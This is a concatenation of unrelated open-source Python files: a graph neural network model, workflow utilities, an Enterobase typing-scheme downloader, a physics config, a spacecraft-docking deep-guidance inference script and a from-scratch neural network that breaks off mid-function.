kw1=np.zeros_like(inputs[1])) jax_outputs = self.variant(jax_func)(kw0=inputs[0], kw1=inputs[1]) self.assertAllClose(tf_outputs, jax_outputs) if __name__ == "__main__": tf.test.main() <reponame>jingmouren/OpenHGNN import torch import torch.nn as nn import torch.nn.functional as F from . import BaseModel, register_model class GNN(nn.Module): """ Aggregate 2-hop neighbor. 
""" def __init__(self, input_dim, output_dim, num_neighbor, use_bias=True): super(GNN, self).__init__() self.input_dim = int(input_dim) self.num_fea = int(input_dim) self.output_dim = int(output_dim) self.num_neighbor = num_neighbor self.use_bias = use_bias self.linear1 = nn.Linear(self.input_dim * 2, 64) self.linear2 = nn.Linear(64+self.num_fea, 64) self.linear3 = nn.Linear(64, self.output_dim) def forward(self, fea): node = fea[:, :self.num_fea] neigh1 = fea[:, self.num_fea:self.num_fea * (self.num_neighbor + 1)] neigh1 = torch.reshape(neigh1, [-1, self.num_neighbor, self.num_fea]) neigh2 = fea[:, self.num_fea * (self.num_neighbor + 1):] neigh2 = torch.reshape(neigh2, [-1, self.num_neighbor, self.num_neighbor, self.num_fea]) neigh2_agg = torch.mean(neigh2, dim=2) tmp = torch.cat([neigh1, neigh2_agg], dim=2) tmp = F.relu(self.linear1(tmp)) emb = torch.cat([node, torch.mean(tmp, dim=1)], dim=1) emb = F.relu(self.linear2(emb)) emb = F.relu(self.linear3(emb)) return emb @register_model('HDE') class HDE(BaseModel): def __init__(self, input_dim, output_dim, num_neighbor, use_bias=True): super(HDE, self).__init__() self.input_dim = int(input_dim) self.output_dim = int(output_dim) self.num_neighbor = num_neighbor self.use_bias = use_bias self.aggregator = GNN(input_dim=input_dim, output_dim=output_dim, num_neighbor=num_neighbor) self.linear1 = nn.Linear(2*self.output_dim, 32) self.linear2 = nn.Linear(32, 2) def forward(self, fea_a, fea_b): emb_a = self.aggregator(fea_a) emb_b = self.aggregator(fea_b) emb = torch.cat([emb_a, emb_b], dim=1) emb = F.relu(self.linear1(emb)) output = self.linear2(emb) return output @classmethod def build_model_from_args(cls, args, hg): return cls(input_dim=args.input_dim, output_dim=args.output_dim, num_neighbor=args.num_neighbor, use_bias=args.use_bias) <gh_stars>100-1000 ''' This module contains utility methods that are used in various places across the sciluigi library ''' import csv import os import time from luigi.six import iteritems def timestamp(datefmt='%Y-%m-%d, %H:%M:%S'): ''' Create timestamp as a formatted string. ''' return time.strftime(datefmt, time.localtime()) def timepath(sep='_'): ''' Create timestmap, formatted for use in file names. ''' return timestamp('%Y%m%d{sep}%H%M%S'.format(sep=sep)) def timelog(): ''' Create time stamp for use in log files. ''' return timestamp('[%Y-%m-%d %H:%M:%S]') def ensuredir(dirpath): ''' Ensure directory exists. ''' if not os.path.exists(dirpath): os.makedirs(dirpath) RECORDFILE_DELIMITER = ':' def recordfile_to_dict(filehandle): ''' Convert a record file to a dictionary. ''' csvrd = csv.reader(filehandle, delimiter=RECORDFILE_DELIMITER, skipinitialspace=True) records = {} for row in csvrd: records[row[0]] = row[1] return records def dict_to_recordfile(filehandle, records): ''' Convert a dictionary to a recordfile. 
''' csvwt = csv.writer(filehandle, delimiter=RECORDFILE_DELIMITER, skipinitialspace=True) rows = [] for key, val in iteritems(records): rows.append([key, val]) csvwt.writerows(rows) <gh_stars>0 from django.urls import path from .views import import_data urlpatterns = [ path('import/', import_data, name='import-data') ] from olctools.accessoryFunctions.accessoryFunctions import make_path, SetupLogging import olctools.databasesetup.settings try: from olctools.databasesetup.settings import ECOLI except (NameError, ImportError): ECOLI = str() try: from olctools.databasesetup.settings import SENTERICA except (NameError, ImportError): SENTERICA = str() try: from olctools.databasesetup.settings import YERSINIA except (NameError, ImportError): YERSINIA = str() from urllib3.exceptions import HTTPError from argparse import ArgumentParser from subprocess import call import logging import urllib3 import shutil import json import os class DownloadScheme(object): def main(self): self.download_profile() if self.name_file: self.read_names() self.download_alleles() def create_request(self, request_str): http = urllib3.PoolManager() headers = urllib3.util.make_headers(basic_auth='{token}:'.format(token=self.api_key)) request = http.request(method='GET', url=request_str, headers=headers, preload_content=False) return request def read_names(self): """ Read in all the names of the genes of interest """ logging.info('Reading names file') with open(self.name_file, 'r') as names: self.names = [name.rstrip() for name in names.readlines()] def download_profile(self): logging.info('Downloading {genus} {scheme} profile'.format(genus=self.genus, scheme=self.scheme)) if self.organism == 'senterica': profile_output = os.path.join(self.output_path, '{scheme}-profiles.list.gz'.format(scheme=self.scheme)) profile_list = os.path.join(self.output_path, '{scheme}-profiles.list'.format(scheme=self.scheme)) else: profile_output = os.path.join(self.output_path, '{scheme}-profiles.gz'.format(scheme=self.scheme)) profile_list = os.path.join(self.output_path, '{scheme}-profiles'.format(scheme=self.scheme)) profile_text = os.path.join(self.output_path, 'profile.txt') if not os.path.isfile(profile_output) and not os.path.isfile(profile_text): address = '{address}{org}/schemes?scheme_name={sn}&limit={limit}&only_fields=download_sts_link' \ .format(address=self.server_address, org=self.organism, sn=self.scheme, limit=400000) try: response = self.create_request(address) try: data = json.loads(response.data.decode('utf-8')) except json.decoder.JSONDecodeError: data = dict() print(response.data.decode('utf-8')) quit() logging.debug(json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))) response.release_conn() for scheme_record in data['Schemes']: profile_link = scheme_record.get('download_sts_link', None) if profile_link: logging.info('Downloading {genus} profiles from {profile_link} to: {profile}' .format(genus=self.genus, profile_link=profile_link, profile=profile_output)) profile_response = self.create_request(profile_link) with open(profile_output, 'wb') as output_profile: while True: profile_data = profile_response.read() if not profile_data: break output_profile.write(profile_data) except (KeyError, HTTPError) as Response_error: error_string = str() for key, value in vars(Response_error).items(): error_string += '{key}: {value}\n'.format(key=key, value=value) print('HTTPError: {error}'.format(error=error_string)) quit() if os.path.isfile(profile_output) and not os.path.isfile(profile_list) and not 
os.path.isfile(profile_text): logging.info('Decompressing {allele}'.format(allele=profile_output)) pigz_cmd = 'pigz -d -f {profile_output}'.format(profile_output=profile_output) call(pigz_cmd, shell=True) try: shutil.move(profile_list, profile_text) except (FileNotFoundError, FileExistsError): pass def download_alleles(self): logging.info('Downloading {genus} {scheme} alleles'.format(genus=self.genus, scheme=self.scheme)) address = '{address}{org}/{sn}/loci?&limit={limit}&scheme={sn}'.format(address=self.server_address, org=self.organism, sn=self.scheme, limit=400000) try: response = self.create_request(address) try: data = json.loads(response.data.decode('utf-8')) except json.decoder.JSONDecodeError: data = dict() print(response.data.decode('utf-8')) quit() logging.debug(json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))) response.release_conn() for locus_record in data['loci']: locus_link = locus_record['download_alleles_link'] locus_file_name = locus_link.split('/')[-1] print(locus_file_name) quit() locus_output = os.path.join(self.output_path, locus_file_name) locus_file = os.path.splitext(locus_output)[0] locus_tfa = locus_file.replace('.fasta', '.tfa') if locus_link: if not os.path.isfile(locus_output) and not os.path.isfile(locus_file) \ and not os.path.isfile(locus_tfa): logging.info('Downloading {scheme} allele {allele}'.format(scheme=self.scheme, allele=locus_file)) locus_reponse = self.create_request(locus_link) with open(locus_output, 'wb') as output_locus: while True: locus_data = locus_reponse.read() if not locus_data: break output_locus.write(locus_data) if os.path.isfile(locus_output) and not os.path.isfile(locus_file): logging.info('Decompressing {allele}'.format(allele=locus_file)) pigz_cmd = 'pigz -d {gz_file}'.format(gz_file=locus_output) call(pigz_cmd, shell=True) if os.path.isfile(locus_file) and not os.path.isfile(locus_tfa): shutil.move(locus_file, locus_tfa) except (KeyError, HTTPError) as Response_error: error_string = str() for key, value in vars(Response_error).items(): error_string += '{key}: {value}\n'.format(key=key, value=value) print('HTTPError: {error}'.format(error=error_string)) quit() def __init__(self, databasepath, organism, scheme, genes=None): self.server_address = 'http://enterobase.warwick.ac.uk/api/v2.0/' self.organism = organism self.scheme = scheme if databasepath.startswith('~'): self.databasepath = os.path.expanduser(os.path.abspath(os.path.join(databasepath))) else: self.databasepath = os.path.abspath(os.path.join(databasepath)) genus_dict = { 'ecoli': 'Escherichia', 'senterica': 'Salmonella', 'yersinia': 'Yersinia' } self.genus = genus_dict[self.organism] self.output_path = os.path.join(self.databasepath, self.scheme.split('_')[0], self.genus) make_path(self.output_path) if genes.startswith('~'): self.name_file = os.path.abspath(os.path.expanduser(os.path.join(genes))) else: self.name_file = os.path.abspath(os.path.join(genes)) self.names = list() assert os.path.isfile(self.name_file), f'Cannot find the supplied file with gene names: {self.name_file}' if self.organism == 'ecoli': self.api_key = ECOLI if not self.api_key: # Use the user input to set the verifier code self.api_key = input('Enter API token from http://enterobase.warwick.ac.uk/species/index/ecoli ') try: with open(olctools.databasesetup.settings.__file__, 'a+') as env: env.write("ECOLI = '{api}'\n".format(api=self.api_key)) except: raise elif self.organism == 'senterica': self.api_key = SENTERICA if not self.api_key: # Use the user input to set the verifier code 
self.api_key = input('Enter API token from http://enterobase.warwick.ac.uk/species/index/senterica ') try: with open(olctools.databasesetup.settings.__file__, 'a+') as env: env.write("SENTERICA = '{api}'\n".format(api=self.api_key)) except: raise else: self.api_key = YERSINIA if not self.api_key: # Use the user input to set the verifier code self.api_key = input('Enter API token from http://enterobase.warwick.ac.uk/species/index/yersinia ') try: with open(olctools.databasesetup.settings.__file__, 'a+') as env: env.write("YERSINIA = '{api}'\n".format(api=self.api_key)) except: raise def cli(): # Parser for arguments parser = ArgumentParser(description='Download typing schemes and alleles from Enterobase') parser.add_argument('-d', '--databasepath', required=True, help='The path to the folder in which the typing scheme is to be installed. The program will ' 'create sub-folders as necessary. So, if you specify ' '/mnt/nas2/databases/assemblydatabases/0.5.0.0, that will be used as the root for the ' 'SCHEME/ORGANISM subfolder, e.g. cgMLST/Escherichia') parser.add_argument('-o', '--organism', required=True, choices=['ecoli', 'senterica', 'yersinia']) parser.add_argument('-s', '--scheme', required=True, choices=['MLST_Achtman', 'cgMLST', 'wgMLST']) parser.add_argument('-g', '--genes', help='Name and path to a file containing the gene names (one per line) to be extracted ' 'from the profile') parser.add_argument('-v', '--verbose', action='store_true', help='Print debug level messages') # Get the arguments into an object arguments = parser.parse_args() # Setup logging SetupLogging(debug=arguments.verbose) download = DownloadScheme(databasepath=arguments.databasepath, organism=arguments.organism, scheme=arguments.scheme, genes=arguments.genes) download.download_profile() download.download_alleles() # If the script is called from the command line, then call the argument parser if __name__ == '__main__': cli() <reponame>ckamtsikis/cmssw from RecoTracker.FinalTrackSelectors.trackAlgoPriorityOrder_cfi import trackAlgoPriorityOrder import RecoTracker.FinalTrackSelectors.simpleTrackListMerger_cfi hiGeneralAndRegitTracks = RecoTracker.FinalTrackSelectors.simpleTrackListMerger_cfi.simpleTrackListMerger.clone( TrackProducer1 = 'hiGeneralTracks', TrackProducer2 = 'hiRegitTracks', promoteTrackQuality = True, copyExtras=True ) """ This script loads in a trained policy neural network and uses it for inference. Typically this script will be executed on the Nvidia Jetson TX2 board during an experiment in the Spacecraft Robotics and Control Laboratory at Carleton University. Script created: June 12, 2019 @author: Kirk (<EMAIL>) """ import tensorflow as tf import numpy as np import socket import time import threading from collections import deque # import code # for debugging #code.interact(local=dict(globals(), **locals())) # Ctrl+D or Ctrl+Z to continue execution try: from settings import Settings except: print("You must load the 'manipulator' environment in settings\n\nQuitting.") raise SystemExit from build_neural_networks import BuildActorNetwork assert Settings.ENVIRONMENT == 'manipulator' # Load an environment to use methods from environment_file = __import__('environment_' + Settings.ENVIRONMENT) # importing the environment """ *# Relative pose expressed in the chaser's body frame; everything else in Inertial frame #* Deep guidance output in x and y are in the chaser body frame """ # Are we testing? 
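# ---------------------------------------------------------------------------
# (Editor's addition) A minimal sketch of the frame convention noted in the
# docstring above, assuming the same 2-D rotation built by the make_C_bI
# helper defined below: make_C_bI(angle) maps inertial-frame vectors into the
# body frame, so its transpose maps body-frame vectors (such as the deep
# guidance x/y output) back into the inertial frame. This helper is
# illustrative only and is not called anywhere in the original script.
def _example_body_to_inertial(v_body_xy, body_angle):
    C_bI = make_C_bI(body_angle)          # inertial -> body rotation matrix
    return np.matmul(C_bI.T, v_body_xy)   # body -> inertial
# ---------------------------------------------------------------------------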
testing = False CHECK_VELOCITY_LIMITS_IN_PYTHON = True HARD_CODE_TARGET_SPIN = False TARGET_SPIN_VALUE = -7*np.pi/180 # [rad/s] SUCCESSFUL_DOCKING_RADIUS = 0.04 # [m] [default: 0.04] overwrite the successful docking radius defined in the environment ############################### ### User-defined parameters ### ############################### offset_x = 0 # Position offset of the target in its body frame offset_y = 0 # Position offset of the target in its body frame offset_angle = 0 # Angle offset of the target in its body frame # Do you want to debug with constant accelerations? DEBUG_CONTROLLER_WITH_CONSTANT_ACCELERATIONS = False constant_Ax = 0 # [m/s^2] in inertial frame constant_Ay = 0 # [m/s^2] in inertial frame constant_alpha = 0 # [rad/s^2] in inertial frame constant_alpha_shoulder = 0 # [rad/s^2] constant_alpha_elbow = 0# [rad/s^2] constant_alpha_wrist = 0# [rad/s^2] def make_C_bI(angle): C_bI = np.array([[ np.cos(angle), np.sin(angle)], [-np.sin(angle), np.cos(angle)]]) # [2, 2] return C_bI class MessageParser: def __init__(self, testing, client_socket, messages_to_deep_guidance, stop_run_flag): print("Initializing Message Parser!") self.client_socket = client_socket self.messages_to_deep_guidance = messages_to_deep_guidance self.stop_run_flag = stop_run_flag self.testing = testing # Items from the Pi self.Pi_time = 0 self.Pi_red_x = 0 self.Pi_red_y = 0 self.Pi_red_theta = 0 self.Pi_red_Vx = 0 self.Pi_red_Vy = 0 self.Pi_red_omega = 0 self.Pi_black_x = 0 self.Pi_black_y = 0 self.Pi_black_theta = 0 self.Pi_black_Vx = 0 self.Pi_black_Vy = 0 self.Pi_black_omega = 0 self.shoulder_theta = 0 self.elbow_theta = 0 self.wrist_theta = 0 self.shoulder_omega = 0 self.elbow_omega = 0 self.wrist_omega = 0 print("Done initializing parser!") def run(self): print("Running Message Parser!") # Run until we want to stop while not self.stop_run_flag.is_set(): if self.testing: # Assign test values # Items from the Pi self.Pi_time = 15 self.Pi_red_x = 3 self.Pi_red_y = 1 self.Pi_red_theta = 0.5 self.Pi_red_Vx = 0 self.Pi_red_Vy = 0 self.Pi_red_omega = 0 self.Pi_black_x = 1 self.Pi_black_y = 1 self.Pi_black_theta = 3.1 self.Pi_black_Vx = 0 self.Pi_black_Vy = 0 self.Pi_black_omega = 0 self.shoulder_theta = 1 self.elbow_theta = 1.2 self.wrist_theta = 0.5 self.shoulder_omega = 0 self.elbow_omega = 0 self.wrist_omega = 0 else: # It's real try: data = self.client_socket.recv(4096) # Read the next value except socket.timeout: print("Socket timeout") continue data_packet = np.array(data.decode("utf-8").splitlines()) #print('Got message: ' + str(data.decode("utf-8"))) # We received a packet from the Pi # input_data_array is: [time, red_x, red_y, red_angle, red_vx, red_vy, red_dangle, black_x, black_y, black_angle, black_vx, black_vy, black_dangle, shoulder_angle, elbow_angle, wrist_angle, shoulder_omega, elbow_omega, wrist_omega] try: self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega = data_packet.astype(np.float32) except: print("Failed data read from jetsonRepeater.py, continuing...") continue if HARD_CODE_TARGET_SPIN: self.Pi_black_omega = TARGET_SPIN_VALUE # Apply the offsets to the target offsets_target_body = np.array([offset_x, offset_y]) offsets_target_inertial = np.matmul(make_C_bI(self.Pi_black_theta).T, 
offsets_target_body) self.Pi_black_x = self.Pi_black_x - offsets_target_inertial[0] self.Pi_black_y = self.Pi_black_y - offsets_target_inertial[1] self.Pi_black_theta = self.Pi_black_theta - offset_angle # Write the data to the queue for DeepGuidanceModelRunner to use! """ This queue is thread-safe. If I append multiple times without popping, the data in the queue is overwritten. Perfect! """ #(self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega) self.messages_to_deep_guidance.append((self.Pi_time, self.Pi_red_x, self.Pi_red_y, self.Pi_red_theta, self.Pi_red_Vx, self.Pi_red_Vy, self.Pi_red_omega, self.Pi_black_x, self.Pi_black_y, self.Pi_black_theta, self.Pi_black_Vx, self.Pi_black_Vy, self.Pi_black_omega, self.shoulder_theta, self.elbow_theta, self.wrist_theta, self.shoulder_omega, self.elbow_omega, self.wrist_omega)) print("Message handler gently stopped") class DeepGuidanceModelRunner: def __init__(self, testing, client_socket, messages_to_deep_guidance, stop_run_flag): print("Initializing deep guidance model runner") self.client_socket = client_socket self.messages_to_deep_guidance = messages_to_deep_guidance self.stop_run_flag = stop_run_flag self.testing = testing # Initializing a variable to check if we've docked self.have_we_docked = 0. # Holding the previous position so we know when SPOTNet gives a new update self.previousSPOTNet_relative_x = 0.0 # Initialize an environment so we can use its methods self.environment = environment_file.Environment() self.environment.reset(False) # Overwrite the successful docking radius self.environment.SUCCESSFUL_DOCKING_RADIUS = SUCCESSFUL_DOCKING_RADIUS # Uncomment this on TF2.0 #tf.compat.v1.disable_eager_execution() # Clear any old graph tf.reset_default_graph() # Initialize Tensorflow, and load in policy self.sess = tf.Session() # Building the policy network self.state_placeholder = tf.placeholder(dtype = tf.float32, shape = [None, Settings.OBSERVATION_SIZE], name = "state_placeholder") self.actor = BuildActorNetwork(self.state_placeholder, scope='learner_actor_main') # Loading in trained network weights print("Attempting to load in previously-trained model\n") saver = tf.train.Saver() # initialize the tensorflow Saver() # Try to load in policy network parameters try: ckpt = tf.train.get_checkpoint_state('../') saver.restore(self.sess, ckpt.model_checkpoint_path) print("\nModel successfully loaded!\n") except (ValueError, AttributeError): print("Model: ", ckpt.model_checkpoint_path, " not found... 
:(") raise SystemExit print("Done initializing model!") def run(self): print("Running Deep Guidance!") counter = 1 # Parameters for normalizing the input relevant_state_mean = np.delete(Settings.STATE_MEAN, Settings.IRRELEVANT_STATES) relevant_half_range = np.delete(Settings.STATE_HALF_RANGE, Settings.IRRELEVANT_STATES) # To log data data_log = [] # Run zeros through the policy to ensure all libraries are properly loaded in deep_guidance = self.sess.run(self.actor.action_scaled, feed_dict={self.state_placeholder:np.zeros([1, Settings.OBSERVATION_SIZE])})[0] # Run until we want to stop while not stop_run_flag.is_set(): # Total state is [relative_x, relative_y, relative_vx, relative_vy, relative_angle, relative_angular_velocity, chaser_x, chaser_y, chaser_theta, target_x, target_y, target_theta, chaser_vx, chaser_vy, chaser_omega, target_vx, target_vy, target_omega] *# Relative pose expressed in the chaser's body frame; everything else in Inertial frame #* # Network input: [relative_x, relative_y, relative_angle, chaser_theta, chaser_vx, chaser_vy, chaser_omega, target_omega] ** Normalize it first ** # Get data from Message Parser try: Pi_time, Pi_red_x, Pi_red_y, Pi_red_theta, \ Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \ Pi_black_x, Pi_black_y, Pi_black_theta, \ Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \ shoulder_theta, elbow_theta, wrist_theta, \ shoulder_omega, elbow_omega, wrist_omega = self.messages_to_deep_guidance.pop() except IndexError: # Queue was empty, try agian continue ############################# ### Check if we've docked ### ############################# # Check the reward function based off this state self.environment.chaser_position = np.array([Pi_red_x, Pi_red_y, Pi_red_theta]) self.environment.chaser_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega]) self.environment.target_position = np.array([Pi_black_x, Pi_black_y, Pi_black_theta]) self.environment.target_velocity = np.array([Pi_black_Vx, Pi_black_Vy, Pi_black_omega]) self.environment.arm_angles = np.array([shoulder_theta, elbow_theta, wrist_theta]) self.environment.arm_angular_rates = np.array([shoulder_omega, elbow_omega, wrist_omega]) # Get environment to check for collisions self.environment.update_end_effector_and_docking_locations() self.environment.update_end_effector_location_body_frame() self.environment.update_relative_pose_body_frame() self.environment.check_collisions() # Ask the environment whether docking occurred self.have_we_docked = np.max([self.have_we_docked, float(self.environment.docked)]) # Extracting end-effector position and docking port position in the Inertial frame end_effector_position = self.environment.end_effector_position docking_port_position = self.environment.docking_port_position # Calculating relative position between the docking port and the end-effector in the Target's body frame docking_error_inertial = end_effector_position - docking_port_position docking_error_target_body = np.matmul(make_C_bI(Pi_black_theta), docking_error_inertial) print("Distance from cone to end-effector in target body frame: ", docking_error_target_body, " Environment thinks we've docked: ", self.have_we_docked) ################################# ### Building the Policy Input ### ################################# total_state = self.environment.make_total_state() policy_input = np.delete(total_state, Settings.IRRELEVANT_STATES) # Normalizing if Settings.NORMALIZE_STATE: normalized_policy_input = (policy_input - relevant_state_mean)/relevant_half_range else: normalized_policy_input = policy_input # 
Reshaping the input normalized_policy_input = normalized_policy_input.reshape([-1, Settings.OBSERVATION_SIZE]) # Run processed state through the policy deep_guidance = self.sess.run(self.actor.action_scaled, feed_dict={self.state_placeholder:normalized_policy_input})[0] # [accel_x, accel_y, alpha] # Rotating the command into the inertial frame if not Settings.ACTIONS_IN_INERTIAL: deep_guidance[0:2] = np.matmul(make_C_bI(Pi_red_theta).T,deep_guidance[0:2]) # Commanding constant values in the inertial frame for testing purposes if DEBUG_CONTROLLER_WITH_CONSTANT_ACCELERATIONS: deep_guidance[0] = constant_Ax # [m/s^2] deep_guidance[1] = constant_Ay # [m/s^2] deep_guidance[2] = constant_alpha # [rad/s^2] deep_guidance[3] = constant_alpha_shoulder # [rad/s^2] deep_guidance[4] = constant_alpha_elbow # [rad/s^2]] deep_guidance[5] = constant_alpha_wrist # [rad/s^2] ################################################################# ### Cap output if we are exceeding the max allowable velocity ### ################################################################# # Stopping the command of additional velocity when we are already at our maximum """ The check for arm velocity exceeding has been transferred to Simulink - June 1, 2021 """ if CHECK_VELOCITY_LIMITS_IN_PYTHON: current_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega]) deep_guidance[:len(current_velocity)][(np.abs(current_velocity) > Settings.VELOCITY_LIMIT[:len(current_velocity)]) & (np.sign(deep_guidance[:len(current_velocity)]) == np.sign(current_velocity))] = 0 # Return commanded action to the Raspberry Pi 3 if self.testing: print(deep_guidance) else: deep_guidance_acceleration_signal_to_pi = str(deep_guidance[0]) + "\n" + str(deep_guidance[1]) + "\n" + str(deep_guidance[2]) + "\n" + str(deep_guidance[3]) + "\n" + str(deep_guidance[4]) + "\n" + str(deep_guidance[5]) + "\n" + str(self.have_we_docked) + "\n" self.client_socket.send(deep_guidance_acceleration_signal_to_pi.encode()) if counter % 2000 == 0: print("Output to Pi: ", deep_guidance, " In table inertial frame or joint frame") print(normalized_policy_input) # Incrementing the counter counter = counter + 1 # Log this timestep's data only if the experiment has actually started if Pi_time > 0: data_log.append([Pi_time, deep_guidance[0], deep_guidance[1], deep_guidance[2], \ deep_guidance[3], deep_guidance[4], deep_guidance[5], \ Pi_red_x, Pi_red_y, Pi_red_theta, \ Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \ Pi_black_x, Pi_black_y, Pi_black_theta, \ Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \ shoulder_theta, elbow_theta, wrist_theta, \ shoulder_omega, elbow_omega, wrist_omega, self.have_we_docked]) print("Model gently stopped.") if len(data_log) > 0: print("Saving data to file...",end='') with open('deep_guidance_data_' + time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.txt', 'wb') as f: np.save(f, np.asarray(data_log)) else: print("Not saving a log because there is no data to write") print("Done!") # Close tensorflow session self.sess.close() ################################################## #### Start communication with JetsonRepeater ##### ################################################## if testing: client_socket = 0 else: # Looping forever until we are connected while True: try: # Try to connect client_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client_socket.connect("/tmp/jetsonRepeater") # Connecting... 
client_socket.settimeout(2) # Setting the socket timeout to 2 seconds print("Connected to JetsonRepeater!") break except: # If connection attempt failed print("Connection to JetsonRepeater FAILED. Trying to re-connect in 1 second") time.sleep(1) # WE ARE CONNECTED # Generate Queues messages_to_deep_guidance = deque(maxlen = 1) ##################### ### START THREADS ### ##################### all_threads = [] stop_run_flag = threading.Event() # Flag to stop all threads # Initialize Message Parser message_parser = MessageParser(testing, client_socket, messages_to_deep_guidance, stop_run_flag) # Initialize Deep Guidance Model deep_guidance_model = DeepGuidanceModelRunner(testing, client_socket, messages_to_deep_guidance, stop_run_flag) all_threads.append(threading.Thread(target = message_parser.run)) all_threads.append(threading.Thread(target = deep_guidance_model.run)) ############################################# ##### STARTING EXECUTION OF ALL THREADS ##### ############################################# # # # # for each_thread in all_threads: # # # each_thread.start() # # # # # ############################################# ############## THREADS STARTED ############## ############################################# counter_2 = 1 try: while True: time.sleep(0.5) if counter_2 % 200 == 0: print("100 seconds in, trying to stop gracefully") stop_run_flag.set() for each_thread in all_threads: each_thread.join() break except KeyboardInterrupt: print("Interrupted by user. Ending gently") stop_run_flag.set() for each_thread in all_threads: each_thread.join() print('Done :)') <reponame>MulattoKid/Multilayerd-General-Neural-Network import numpy as np from matplotlib import pyplot as plt class Layer: def __init__(self, layer_num, num_inputs, num_nodes, is_output_layer): self.layer_num = layer_num self.inputs = np.zeros(shape=(1, num_inputs + 1)) #+1 for bias term self.weights = np.zeros(shape=(num_inputs + 1, num_nodes)) #+1 for bias term self.deltas = np.zeros(shape=(num_nodes, 1)) #Stores delta for each node in layer self.outputs = np.zeros(shape=(1, num_nodes)) self.is_output_layer = is_output_layer self.dropouts = np.ones(shape=(num_nodes)) #Only used if dropout is activated #Weight initialization range=[-1/sqrt(num_nodes), 1/sqrt(num_nodes)) weight_range = 1.0 / np.sqrt(num_inputs) for y in range(self.weights.shape[0]): for x in range(self.weights.shape[1]): self.weights[y][x] = np.random.uniform(-weight_range, weight_range) def Print(self): print() print("Layer number:", self.layer_num) print("Input shape:", self.inputs.shape) print("Weights shape:", self.weights.shape) print("Deltas:", self.deltas.shape[0]) print("Output shape:", self.outputs.shape) print("Is output layer:", self.is_output_layer) def UpdateOutput(self, inputs, apply_dropout, dropout_rate): self.inputs = inputs self.outputs = np.matmul(self.inputs, self.weights) self.outputs = 1.0 / (1.0 + np.exp(-self.outputs)) #Logistic activation function if apply_dropout and not self.is_output_layer: for node in range(len(self.dropouts)): self.dropouts[node] = 1.0 if np.random.uniform() > dropout_rate else 0.0 self.outputs[0] = np.multiply(self.outputs[0], self.dropouts) self.dropouts.fill(1.0) #Reset self.dropouts self.outputs[0] *= 1.0 / (1.0 - dropout_rate) self.outputs = np.append(self.outputs, [[-1]], axis=1) #Add bias term to output so that the next layer has it as part of its input class NeuralNetwork: def __init__(self, layer_sizes, learning_rate, apply_dropout=False, dropout_rate=0.2): self.training_cases = [] self.validation_cases = 
[] self.num_layers = len(layer_sizes) - 1 #Disregard input layer self.output_layer = self.num_layers - 1 self.num_hidden_layers = self.num_layers - 1 self.num_inputs = layer_sizes[0] #Size of input layer self.layer_sizes = layer_sizes[1:] #Specifies the number of nodes in each hidden layer self.CreateLayers() self.learning_rate = learning_rate self.apply_dropout = apply_dropout self.dropout_rate = dropout_rate self.errors = [] self.Print() def Print(self): print("Number of layers:", self.num_layers, "(+1 if you include input layer)") print("Number of hidden layers:", self.num_hidden_layers) print("Number of inputs:", self.num_inputs) print("Sizes of layers:", self.layer_sizes) for layer in self.layers: layer.Print() print() def CreateLayers(self): self.layers = [] self.layers.append(Layer(0, self.num_inputs, self.layer_sizes[0], self.num_layers == 1)) #Take special care of 1st layer as it depends on the size of the input layer for i in range(1, self.num_layers): #Create remaining layers self.layers.append(Layer(i, self.layer_sizes[i - 1], self.layer_sizes[i], i == self.num_layers - 1)) def FeedForward(self, inputs): self.layers[0].UpdateOutput(inputs, self.apply_dropout, self.dropout_rate) #Perform manual update on first layer for i in range(1, self.num_layers): #Update remaining layers self.layers[i].UpdateOutput(self.layers[i - 1].outputs, self.apply_dropout, self.dropout_rate) def BackpropagationMultiLayer(self, targets): outputs = np.reshape(self.layers[self.output_layer].outputs, newshape=(self.layers[self.output_layer].outputs.shape[1])) #Remove second dimension of output outputs = outputs[:-1] #Remember we add a bias "node" to each layer's output -> remove bias from output so that it is not taken into account when calculating error error = np.sum(0.5 * np.power((targets - outputs), 2)) #Squared Error #Take special care of the output layer's weights for node in range(self.layers[self.output_layer].weights.shape[1]): #For each node in output layer -> column in weight matrix target_v = targets[node] output_v = outputs[node] #Calculate delta-value for current node self.layers[self.output_layer].deltas[node][0] = output_v * (1.0 - output_v) * (target_v - output_v) for weight in range(self.layers[self.output_layer].weights.shape[0]): #For each weight connected to this node -> row in weight matrix input_v = self.layers[self.output_layer].inputs[0][weight] #Get input to current weight #Calculate update for each weight for given node weight_delta = self.layers[self.output_layer].deltas[node] * input_v self.layers[self.output_layer].weights[weight][node] += self.learning_rate * weight_delta for layer in range(self.output_layer - 1, -1, -1): #Iterate over remaining layers, starting from the second to last to the first (excluding input layer) for node in range(self.layers[layer].weights.shape[1]): #For each node in layer -> column in weight matrix #Calculate delta-value for current node node_output = self.layers[layer].outputs[0][node] self.layers[layer].deltas[node] = node_output * (1.0 - node_output) next_layer = layer + 1 delta_addition = 0.0 for weight in range(self.layers[next_layer].weights.shape[1]): #For each weight that connect the current node to a node in next_layer -> iterates through a row in the weight matrix of next_layer delta_addition += self.layers[next_layer].weights[node][weight] * self.layers[next_layer].deltas[weight] self.layers[layer].deltas[node] *= delta_addition for weight in range(self.layers[layer].weights.shape[0]): #For each weight that connect the current node to 
